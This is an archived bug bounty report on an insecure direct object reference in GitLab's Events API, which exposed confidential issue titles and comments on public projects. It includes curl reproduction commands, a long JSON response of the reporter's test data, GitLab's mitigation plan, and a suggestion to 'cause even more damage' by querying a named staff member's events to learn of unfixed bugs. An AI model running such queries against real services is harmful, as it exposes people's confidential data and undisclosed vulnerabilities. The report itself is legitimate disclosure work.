Confidential Information Exposed in Events API Endpoint

Title:         [IDOR] Confidential Information Exposed in Events API Endpoint
Scope:         *.gitlab.com
Weakness:      Insecure Direct Object Reference (IDOR)
Severity:      No Rating
Link:          https://hackerone.com/reports/411647
Date:          2018-09-20 05:34:26 +0000
By:            @ngalog

Details: Intro: In https://docs.gitlab.com/ee/api/events.html, there is event endpoint to track the contribution event of specific user, however it leaks a lot of sensitive information in this endpoint without proper authorization.

Description: Attacker could have read access to public project's confidential issue title, comments, reactions etc.

Mitigation Summary

The issue was introduced in 9.3 with https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/11755 so there is no option to roll back GitLab.com to mitigate this problem.
The current proposed fix is in https://dev.gitlab.org/gitlab/gitlabhq/merge_requests/2514 which is slated to be in the next security release https://gitlab.com/gitlab-org/gitlab-ce/issues/51048 as soon as this is ready we should prepare a post-deployment patch for GitLab.com.
In order to mitigate this on GitLab the proposal is to globally block the events at haproxy, this would mean blocking all requests to /api/v4/{users,projects}/<userid>/events.

Steps To Reproduce:

Command

 curl --header "PRIVATE-TOKEN: <API TOKEN>" https://gitlab.com/api/v4/users/2820780/events

Response

[{"project_id":8467633,"action_name":"commented on","target_id":102939716,"target_iid":102939716,"target_type":"Note","author_id":2820780,"target_title":"THIS IS SPARTA!","created_at":"2018-09-20T05:22:45.846Z","note":{"id":102939716,"type":null,"body":"Commenting with private password: password!!!","attachment":null,"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"created_at":"2018-09-20T05:22:45.724Z","updated_at":"2018-09-20T05:22:45.724Z","system":false,"noteable_id":14324424,"noteable_type":"Issue","resolvable":false,"noteable_iid":1},"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8467633,"action_name":"opened","target_id":14324424,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"THIS IS SPARTA!","created_at":"2018-09-20T05:22:07.001Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8467633,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-20T05:21:35.295Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8343565,"action_name":"commented on","target_id":102936748,"target_iid":102936748,"target_type":"Note","author_id":2820780,"target_title":"This is SPARTA","created_at":"2018-09-20T05:19:51.131Z","note":{"id":102936748,"type":null,"body":"entering private password here","attachment":null,"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"created_at":"2018-09-20T05:19:51.029Z","updated_at":"2018-09-20T05:19:51.029Z","system":false,"noteable_id":14324406,"noteable_type":"Issue","resolvable":false,"noteable_iid":3},"author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8343565,"action_name":"opened","target_id":14324406,"target_iid":3,"target_type":"Issue","author_id":2820780,"target_title":"This is SPARTA","created_at":"2018-09-20T05:19:39.820Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8456252,"action_name":"opened","target_id":14295896,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"new issues","created_at":"2018-09-19T12:36:53.137Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8456252,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-19T12:34:39.579Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8430964,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-18T04:26:30.287Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337740,"action_name":"joined","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-11T23:31:15.659Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077590,"target_iid":6,"target_type":"Issue","author_id":2820780,"target_title":"private should not be tell","created_at":"2018-09-11T22:59:04.677Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077538,"target_iid":4,"target_type":"Issue","author_id":2820780,"target_title":"asdf","created_at":"2018-09-11T22:50:52.304Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077530,"target_iid":3,"target_type":"Issue","author_id":2820780,"target_title":"second or third issue","created_at":"2018-09-11T22:48:37.932Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077516,"target_iid":2,"target_type":"Issue","author_id":2820780,"target_title":"Awesomeproject","created_at":"2018-09-11T22:46:13.272Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"opened","target_id":14077514,"target_iid":1,"target_type":"Issue","author_id":2820780,"target_title":"Awesomeproject","created_at":"2018-09-11T22:45:57.655Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"},{"project_id":8337576,"action_name":"created","target_id":null,"target_iid":null,"target_type":null,"author_id":2820780,"target_title":null,"created_at":"2018-09-11T22:45:34.683Z","author":{"id":2820780,"name":"Gold","username":"goldngalog3","state":"active","avatar_url":"https://secure.gravatar.com/avatar/ca2a87b3c97408af1db3383558c293bd?s=80\u0026d=identicon","web_url":"https://gitlab.com/goldngalog3"},"author_username":"goldngalog3"}]

You will be able to see the confidential issue I opened here https://gitlab.com/goldngalog3/publicproject/issues/1

You can't see it on gitlab.com UI, but you can see it in API response

If you want to cause even more damage, just issue this command to view user @jritchey activities, since it will disclose a lot information about what existing bugs are in gitlab ce/ee/runner

 curl --header "PRIVATE-TOKEN: <API TOKEN>" https://gitlab.com/api/v4/users/1895698/events

PS: Private project are not affected, only the public project with confidential issues are affected

Impact

View confidential issues/comments/titles etc on public project

Edited Nov 22, 2018 by Dennis Appelt